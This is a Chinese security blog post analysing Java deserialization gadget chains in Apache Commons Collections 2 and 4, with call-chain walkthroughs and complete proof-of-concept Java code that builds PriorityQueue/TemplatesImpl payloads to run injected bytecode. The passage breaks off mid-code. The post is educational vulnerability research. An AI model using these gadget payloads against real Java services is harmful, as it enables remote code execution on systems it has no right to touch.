<!DOCTYPE html>
<html>

	<head>
		
<title>Java反序列化-Commons Collections2、4、5、7利用链分析-信息安全博客</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/favicon1.ico">


<meta name="keywords" content="java安全,cc链,">
<meta name="description" content="">


<script src="/js/jquery.min.js"></script>


	<meta name="generator" content="Hexo 5.4.0"></head>

	<body>
		
<link rel="stylesheet" href="/css/page.css">


<link rel="stylesheet" href="/css/page_cente.css">


<link rel="stylesheet" href="/css/atom-one-dark.css">


<link rel="stylesheet" href="/css/header.css">

	<div class="header">
		<div class="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/logo.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										主页
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										文章
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										分类
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										标签
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										友情链接
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										关于
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>TRRQ</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">主页</a>
        </li>
        
        <li>
            <a href="/archives">文章</a>
        </li>
        
        <li>
            <a href="/categories">分类</a>
        </li>
        
        <li>
            <a href="/tags">标签</a>
        </li>
        
        <li>
            <a href="/links">友情链接</a>
        </li>
        
        <li>
            <a href="/about">关于</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/qiaobug">
            <img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'
    style='cursor: pointer;display: none; position: fixed;left: 0;top: 0; right: 0;bottom: 0;background-color: #333;opacity:0.5;z-index: 108;'>
</div>
<style>
    .sidebar {
        width: 0;
        height: 100%;
        position: fixed;
        top: 0;
        right: 0;
        bottom: 0;
        background: #fff;
        z-index: 999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815)
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url(https://api.ixiaowai.cn/gqapi/gqapi.php) no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $(function () { $('.h-right-close>svg').click(function () { $('.sidebar').animate({ width: "66%" }, 500); $('.shelter').fadeIn("slow") }); $('.shelter').click(function (e) { $('.sidebar').animate({ width: "0" }, 500); $('.shelter').fadeOut("slow") }) })
</script>
		<script>
			$(function () { $(window).scroll(function () { if ($(document).scrollTop() > 100) { $(".header-top").removeClass("header-move2"); $('.header-top').addClass('header-move1') } else { $(".header-top").removeClass("header-move1"); $('.header-top').addClass('header-move2') } }) });
		</script>
<div class="header-bg bg-content-img">
    <div class="bg-content">
        <ul class="tag">
            
            
            <li><a href="/tags/java安全">java安全</a></li>
            
            <li><a href="/tags/cc链">cc链</a></li>
            
            
        </ul>
        <h1>Java反序列化-Commons Collections2、4、5、7利用链分析</h1>
        <div class="article-info">
            <div class="article-author">
                
                <svg t="1604839279282" class="icon" viewBox="0 0 1024 1024" version="1.1"
                    xmlns="http://www.w3.org/2000/svg" p-id="2901" width="20" height="20">
                    <path
                        d="M513 956.3c-247.7 0-448-200.3-448-448S265.3 66.2 513 66.2s448 200.3 448 448-200.3 442.1-448 442.1z m0-830.9c-212.2 0-388.8 170.7-388.8 388.8C124.2 726.3 294.9 903 513 903c212.2 0 388.8-170.7 388.8-388.8S725.2 125.4 513 125.4z m0 430.2c-94.2 0-170.7-76.5-170.7-170.7S418.8 207.8 513 207.8s170.7 76.5 170.7 170.7S607.2 555.6 513 555.6z m0-289.1c-64.6 0-112 52.8-112 112s47.4 117.9 112 117.9 112-52.8 112-112-47.4-117.9-112-117.9z m0 689.8c-135.7 0-259-58.7-341.9-158.9l-11.8-17.8 11.8-17.8c76.5-117.9 206.2-188.5 347.8-188.5 135.7 0 265 64.6 341.9 182.6l11.8 17.8-11.8 17.8C778 897.1 648.7 956.3 513 956.3zM230.3 773.2C300.9 849.7 406.9 897 513 897c112 0 218.1-47.4 288.6-129.8-70.5-88.2-170.7-135.6-282.7-135.6s-218.1 53.3-288.6 141.6z"
                        p-id="2902" fill="#ffffff"></path>
                </svg>
                
                <span> <a href="">TRRQ</a></span>
                <p>2022-03-06 14:54:43</p>
            </div>
        </div>
    </div>
</div>
<div class="article-content">
    <div id="article" class="content">
        <h1 id="Java反序列化-Commons-Collections2、4、5、7利用链分析"><a href="#Java反序列化-Commons-Collections2、4、5、7利用链分析" class="headerlink" title="Java反序列化-Commons Collections2、4、5、7利用链分析"></a>Java反序列化-Commons Collections2、4、5、7利用链分析</h1><p>Commons Collections2、4、5、7用的都是commons.collections4版本的链</p>
</br>

<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p>PriorityQueue优先级队列是基于优先级堆的一种特殊队列，会给每个元素定义出”优先级“，取出数据的时候会按照优先级来取。</p>
<p>默认优先级队列会根据自然顺序来对元素排序。</p>
<p>而想要放入PriorityQueue的元素，就必须实现Comparable接口，PriorityQueue会根据元素的排序顺序决定出队的优先级。</p>
<p>如果没有实现 Comparable 接口，PriorityQueue 还允许我们提供一个 Comparator 对象来判断两个元素的顺序</p>
</br>

<p>构造方法</p>
<figure class="highlight stylus"><table><tr><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">PriorityQueue</span><span class="hljs-params">()</span></span>使用默认的初始容量（<span class="hljs-number">11</span>）创建一个 PriorityQueue，并根据其自然顺序对元素进行排序。<br><span class="hljs-function"><span class="hljs-title">PriorityQueue</span><span class="hljs-params">(int initialCapacity)</span></span>使用指定的初始容量创建一个 PriorityQueue，并根据其自然顺序对元素进行排序。<br></code></pre></td></tr></table></figure>

<p>常用方法：</p>
<figure class="highlight stylus"><table><tr><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(E e)</span></span>                       将指定的元素插入此优先级队列<br><span class="hljs-function"><span class="hljs-title">clear</span><span class="hljs-params">()</span></span>                        从此优先级队列中移除所有元素。<br><span class="hljs-function"><span class="hljs-title">comparator</span><span class="hljs-params">()</span></span>                   返回用来对此队列中的元素进行排序的比较器；如果此队列根据其元素的自然顺序进行排序，则返回 null<br><span class="hljs-function"><span class="hljs-title">contains</span><span class="hljs-params">(Object o)</span></span>          如果此队列包含指定的元素，则返回 true。<br><span class="hljs-function"><span class="hljs-title">iterator</span><span class="hljs-params">()</span></span>                   返回在此队列中的元素上进行迭代的迭代器。<br><span class="hljs-function"><span class="hljs-title">offer</span><span class="hljs-params">(E e)</span></span>                   将指定的元素插入此优先级队列<br><span class="hljs-function"><span class="hljs-title">peek</span><span class="hljs-params">()</span></span>                       获取但不移除此队列的头；如果此队列为空，则返回 null。<br><span class="hljs-function"><span class="hljs-title">poll</span><span class="hljs-params">()</span></span>                       获取并移除此队列的头，如果此队列为空，则返回 null。<br><span class="hljs-function"><span class="hljs-title">remove</span><span class="hljs-params">(Object o)</span></span>               从此队列中移除指定元素的单个实例（如果存在）。<br><span class="hljs-function"><span class="hljs-title">size</span><span class="hljs-params">()</span></span>                       返回此 collection 中的元素数。<br><span class="hljs-function"><span class="hljs-title">toArray</span><span class="hljs-params">()</span></span>                      返回一个包含此队列所有元素的数组。<br></code></pre></td></tr></table></figure>

<p>案例：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> NotFoundException </span>&#123;<br>        PriorityQueue priorityQueue=<span class="hljs-keyword">new</span> PriorityQueue(<span class="hljs-number">2</span>);<br>        priorityQueue.add(<span class="hljs-number">4</span>);<br>        priorityQueue.add(<span class="hljs-number">3</span>);<br>        priorityQueue.add(<span class="hljs-number">2</span>);<br>        priorityQueue.add(<span class="hljs-number">1</span>); <span class="hljs-comment">//add()添加指定元素到队列</span><br>        System.out.println(priorityQueue);<br>        System.out.println(priorityQueue.poll()); <span class="hljs-comment">//poll获取队列的头</span><br>    &#125;<br></code></pre></td></tr></table></figure>

</br>

<h2 id="Commons-Collections4"><a href="#Commons-Collections4" class="headerlink" title="Commons Collections4"></a>Commons Collections4</h2><h3 id="Gadget-chain"><a href="#Gadget-chain" class="headerlink" title="Gadget chain"></a>Gadget chain</h3><figure class="highlight reasonml"><table><tr><td class="code"><pre><code class="hljs reasonml">getTransletInstancePriorityQueue.readObject<br>	<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>heapify<br>	<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>siftDown<br>	<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>siftDownUsingComparator<br>		<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TransformingComparator</span>.</span></span>compare<br>			<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">ChainedTransformer</span>.</span></span>transform<br>				TrAXFilter<br>					<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TemplatesImpl</span>.</span></span>newTransformer<br>					<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TemplatesImpl</span>.</span></span>getTransletInstance<br>					<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TemplatesImpl</span>.</span></span>defineTransletClasses<br>						cc4.<span class="hljs-keyword">new</span><span class="hljs-constructor">Instance()</span><br>							<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Runtime</span>.</span></span>exec<span class="hljs-literal">()</span><br></code></pre></td></tr></table></figure>

</br>

<h3 id="利用链分析"><a href="#利用链分析" class="headerlink" title="利用链分析"></a>利用链分析</h3><p>我们看下这个链与前面几条链相比只是transform方法找的不一样，其他前面是一样的</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307170947.png" alt="img"></p>
<p>最后我们找到了这个，transformer可控并且可以序列化</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307185231.png" alt="img"></p>
<p>我们可以看看谁调用了compare</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190114.png" alt="img"></p>
<p>可以看到这里这里调用compare</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190019.png" alt="img"></p>
<p>我们查下谁调用了siftDownUsingComparator</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190718.png" alt="img"></p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190749.png" alt="img"></p>
<p>我们继续往下走，看看谁调用siftDown</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190829.png" alt="img"></p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190907.png" alt="img"></p>
<p>最后找到了readObject方法调用</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307190940.png" alt="img"></p>
<p>链这样我们就找完了</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307191016.png" alt="img"></p>
<p>我们首先看下这个compare方法需要传哪些值，这里的this.transformer需要传InvokerTransformer</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307195438.png" alt="img"></p>
<p>通过构造方法进行传入</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307195754.png" alt="img"></p>
<p>PriorityQueue需要传入TransformingComparator对象</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307200607.png" alt="img"></p>
<p>我们先调试看看，还需要哪些参数</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307201042.png" alt="img"></p>
<p>这里的queue属性是无法被序列化的，但是如果是拆开单个存储的话，是可以被序列化的</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308094816.png" alt="img"></p>
<p>进入heapify，可以看到我们这边就直接跳出去了，size=0，右移三位，size右移1位则是1，所以说size=2才能进入这个方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220307201133.png" alt="img"></p>
<p>所以这里我们要传入queue，这就要用到add方法，所以我们看下这个方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308102816.png" alt="img"></p>
<p>add调用了offer方法，最终调用siftUp方法</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220310165358.png" alt="img"></p>
<p>最终还是会调用到这里</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308103033.png" alt="img"></p>
<p>最终还是会调用到compare的方法，这样就会造成本地执行</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308103558.png" alt="img"></p>
<p>所以老样子，我们要将在add前面的时候先不触发执行，等执行完add方法后，再将填入参数修改回来</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308152246.png" alt="img"></p>
</br>

<h3 id="POC"><a href="#POC" class="headerlink" title="POC"></a>POC</h3><p>最终POC</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ysoserial.test;<br><br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.comparators.TransformingComparator;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.functors.ChainedTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.functors.InstantiateTransformer;<br><br><span class="hljs-keyword">import</span> javax.xml.transform.Templates;<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><span class="hljs-keyword">import</span> java.util.PriorityQueue;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test4</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception</span>&#123;<br>        TemplatesImpl templates = <span class="hljs-keyword">new</span> TemplatesImpl();<br>        Class tc = templates.getClass();<br><br>        <span class="hljs-comment">//设置_name属性</span><br>        Field nameField = tc.getDeclaredField(<span class="hljs-string">&quot;_name&quot;</span>);<br>        nameField.setAccessible(<span class="hljs-keyword">true</span>);<br>        nameField.set(templates,<span class="hljs-string">&quot;aaaa&quot;</span>);<br><br>        <span class="hljs-comment">//设置_bytecodes属性</span><br>        Field bytecodesField = tc.getDeclaredField(<span class="hljs-string">&quot;_bytecodes&quot;</span>);<br>        bytecodesField.setAccessible(<span class="hljs-keyword">true</span>);<br><br>        <span class="hljs-comment">//设置codes属性</span><br>        <span class="hljs-keyword">byte</span>[] code  = Files.readAllBytes(Paths.get(<span class="hljs-string">&quot;E://tmp/calc.class&quot;</span>));<br>        <span class="hljs-keyword">byte</span>[][] codes = &#123;code&#125;;<br>        bytecodesField.set(templates,codes);<br>        <br>        Transformer[] transformers = <span class="hljs-keyword">new</span> Transformer[]&#123;<br>            <span class="hljs-keyword">new</span> ConstantTransformer(TrAXFilter.class),<br>            <span class="hljs-keyword">new</span> InstantiateTransformer(<span class="hljs-keyword">new</span> Class[]&#123;Templates.class&#125;, <span class="hljs-keyword">new</span> Object[]&#123;templates&#125;)<br>        &#125;;<br>		<br>        <span class="hljs-comment">//满足前面调用触发</span><br>        ChainedTransformer chainedTransformer = <span class="hljs-keyword">new</span> ChainedTransformer(transformers);<br><br>        TransformingComparator transformingComparator = <span class="hljs-keyword">new</span> TransformingComparator&lt;&gt;(<span class="hljs-keyword">new</span> ConstantTransformer&lt;&gt;(<span class="hljs-number">1</span>));<br><br>        PriorityQueue priorityQueue = <span class="hljs-keyword">new</span> PriorityQueue&lt;&gt;(transformingComparator);<br><br>        <span class="hljs-comment">//size满足为2</span><br>        priorityQueue.add(<span class="hljs-number">1</span>);<br>        priorityQueue.add(<span class="hljs-number">2</span>);<br><br>        <span class="hljs-comment">//防止add在序列化前触发</span><br>        Class c = transformingComparator.getClass();<br>        Field transformer = c.getDeclaredField(<span class="hljs-string">&quot;transformer&quot;</span>);<br>        transformer.setAccessible(<span class="hljs-keyword">true</span>);<br>        transformer.set(transformingComparator,chainedTransformer);<br><br>        <span class="hljs-comment">//序列化和反序列化</span><br>        serialize(priorityQueue);<br>        unserialize();<br>    &#125;<br><br>    <span class="hljs-comment">//序列化和反序列化</span><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">serialize</span><span class="hljs-params">(Object o)</span> <span class="hljs-keyword">throws</span> IOException </span>&#123;<br>        <span class="hljs-comment">// ObjectOutputStream 对象输出流，将Person对象存储到E盘的Person.txt文件中，完成对Person对象的序列化操作</span><br>        ObjectOutputStream oo = <span class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        oo.writeObject(o);<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> Object <span class="hljs-title">unserialize</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>        ObjectInputStream ois = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> FileInputStream(<br>            <span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        Object object = (Object) ois.readObject();<br>        System.out.println(<span class="hljs-string">&quot;反序列化成功！&quot;</span>);<br>        <span class="hljs-keyword">return</span> object;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

</br>

<h2 id="Commons-Collections2"><a href="#Commons-Collections2" class="headerlink" title="Commons Collections2"></a>Commons Collections2</h2><h3 id="Gadget-chain-1"><a href="#Gadget-chain-1" class="headerlink" title="Gadget chain"></a>Gadget chain</h3><figure class="highlight reasonml"><table><tr><td class="code"><pre><code class="hljs reasonml"><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>read<span class="hljs-constructor">Object()</span><br><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>heapify<span class="hljs-literal">()</span><br><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>sift<span class="hljs-constructor">Down()</span><br><span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PriorityQueue</span>.</span></span>sift<span class="hljs-constructor">DownUsingConparator()</span><br>	<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TransformingComparator</span>.</span></span>compare<span class="hljs-literal">()</span><br>		<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">InvokerTransformer</span>.</span></span>transform<span class="hljs-literal">()</span><br>			<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">TemplatesImpl</span>.</span></span><span class="hljs-keyword">new</span><span class="hljs-constructor">Tranformer()</span><br>				<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Method</span>.</span></span>invoke<span class="hljs-literal">()</span><br>					<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">Runtime</span>.</span></span>exec<span class="hljs-literal">()</span><br></code></pre></td></tr></table></figure>

<p>与Commons Collections4链不同的是，不走TrAXFilter实例化，想到其他地方调用到TemplatesImpl.newTranformer()</p>
<h3 id="利用链分析-1"><a href="#利用链分析-1" class="headerlink" title="利用链分析"></a>利用链分析</h3><p>整条链是这样的</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308191618.png" alt="img"></p>
<p>传入queue，这个是我们可控的</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308191723.png" alt="img"></p>
<p>调用了siftDown函数，传入x是我们可控的</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308191809.png" alt="img"></p>
<p>comparator.compare传入的x</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308192054.png" alt="img"></p>
<p>通过构造方法，第一个参数是此优先级队列的初始容量，我们传入2，因为我们就传2个，第二个参数是传入我们的TransformingComparator，这样才能调用到TransformingComparator.compare</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308193431.png" alt="img"></p>
</br>

<p>接着下一步就调用到transformer.transform，这里的transformer我需要传InvokerTransformer</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308203219.png" alt="img"></p>
<p>InvokerTransformer我们要调用到newTransformer，所以我们这样写</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java">InvokerTransformer&lt;Object,Object&gt; invokerTransformer = <span class="hljs-keyword">new</span> InvokerTransformer&lt;&gt;(<span class="hljs-string">&quot;newTranformer&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;&#125;, <span class="hljs-keyword">new</span> Object[]&#123;&#125;);<br><br><span class="hljs-comment">//为了调用invokerTransformer.transform</span><br>TransformingComparator transformingComparator = <span class="hljs-keyword">new</span> TransformingComparator(invokerTransformer);<br><br><span class="hljs-comment">//队列初始容量为2，为了调用到TransformingComparator.compare</span><br>PriorityQueue priorityQueue = <span class="hljs-keyword">new</span> PriorityQueue&lt;&gt;(<span class="hljs-number">2</span>,transformingComparator);<br><br><span class="hljs-comment">//size满足为2，必须传入第二个，否则一开始就返回错误</span><br>priorityQueue.add(templates);<br>priorityQueue.add(templates);<br></code></pre></td></tr></table></figure>

<p>构造完后，就传入transformer(templates)</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308203320.png" alt="img"></p>
</br>

<p>最后触发到getTransletInstance</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308204529.png" alt="img"></p>
<p>最终执行到我们传入的_class</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308204609.png" alt="img"></p>
</br>

<p>由于add方法会在本地直接执行</p>
<p><img src="https://trrqserc-1254798411.cos.ap-guangzhou.myqcloud.com/blog-img/20220308213037.png" alt="img"></p>
</br>

<h3 id="POC-1"><a href="#POC-1" class="headerlink" title="POC"></a>POC</h3><p>最终POC</p>
<figure class="highlight java"><table><tr><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ysoserial.test;<br><br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;<br><span class="hljs-keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.functors.ConstantTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.functors.InvokerTransformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.Transformer;<br><span class="hljs-keyword">import</span> org.apache.commons.collections4.comparators.TransformingComparator;<br><br><span class="hljs-keyword">import</span> javax.xml.transform.Templates;<br><span class="hljs-keyword">import</span> java.io.*;<br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.nio.file.Files;<br><span class="hljs-keyword">import</span> java.nio.file.Paths;<br><span class="hljs-keyword">import</span> java.util.PriorityQueue;<br><br><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Test2</span> </span>&#123;<br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception</span>&#123;<br>        TemplatesImpl templates = <span class="hljs-keyword">new</span> TemplatesImpl();<br>        Class tc = templates.getClass();<br><br>        <span class="hljs-comment">//设置_name属性</span><br>        Field nameField = tc.getDeclaredField(<span class="hljs-string">&quot;_name&quot;</span>);<br>        nameField.setAccessible(<span class="hljs-keyword">true</span>);<br>        nameField.set(templates,<span class="hljs-string">&quot;aaaa&quot;</span>);<br><br>        <span class="hljs-comment">//设置_bytecodes属性</span><br>        Field bytecodesField = tc.getDeclaredField(<span class="hljs-string">&quot;_bytecodes&quot;</span>);<br>        bytecodesField.setAccessible(<span class="hljs-keyword">true</span>);<br><br>        <span class="hljs-comment">//设置codes属性</span><br>        <span class="hljs-keyword">byte</span>[] code  = Files.readAllBytes(Paths.get(<span class="hljs-string">&quot;E://tmp/calc.class&quot;</span>));<br>        <span class="hljs-keyword">byte</span>[][] codes = &#123;code&#125;;<br>        bytecodesField.set(templates,codes);<br><br>        InvokerTransformer&lt;Object,Object&gt; invokerTransformer = <span class="hljs-keyword">new</span> InvokerTransformer&lt;&gt;(<span class="hljs-string">&quot;newTransformer&quot;</span>, <span class="hljs-keyword">new</span> Class[]&#123;&#125;, <span class="hljs-keyword">new</span> Object[]&#123;&#125;);<br><br>        TransformingComparator transformingComparator = <span class="hljs-keyword">new</span> TransformingComparator&lt;&gt;(<span class="hljs-keyword">new</span> ConstantTransformer(<span class="hljs-number">1</span>));<br><br>        PriorityQueue priorityQueue = <span class="hljs-keyword">new</span> PriorityQueue&lt;&gt;(<span class="hljs-number">2</span>,transformingComparator);<br><br>        <span class="hljs-comment">//size满足为2</span><br>        priorityQueue.add(templates);<br>        priorityQueue.add(templates);<br><br>        <span class="hljs-comment">//反射修改回来</span><br>        Class c = transformingComparator.getClass();<br>        Field transformer = c.getDeclaredField(<span class="hljs-string">&quot;transformer&quot;</span>);<br>        transformer.setAccessible(<span class="hljs-keyword">true</span>);<br>        transformer.set(transformingComparator,invokerTransformer);<br><br><span class="hljs-comment">//        serialize(priorityQueue);</span><br>        unserialize();<br>    &#125;<br><br>    <span class="hljs-comment">//序列化和反序列化</span><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">serialize</span><span class="hljs-params">(Object o)</span> <span class="hljs-keyword">throws</span> IOException </span>&#123;<br>        <span class="hljs-comment">// ObjectOutputStream 对象输出流，将Person对象存储到E盘的Person.txt文件中，完成对Person对象的序列化操作</span><br>        ObjectOutputStream oo = <span class="hljs-keyword">new</span> ObjectOutputStream(<span class="hljs-keyword">new</span> FileOutputStream(<span class="hljs-keyword">new</span> File(<span class="hljs-string">&quot;ser.bin&quot;</span>)));<br>        oo.writeObject(o);<br>    &#125;<br><br>    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> Object <span class="hljs-title">unserialize</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>&#123;<br>        ObjectInputStream ois = <span 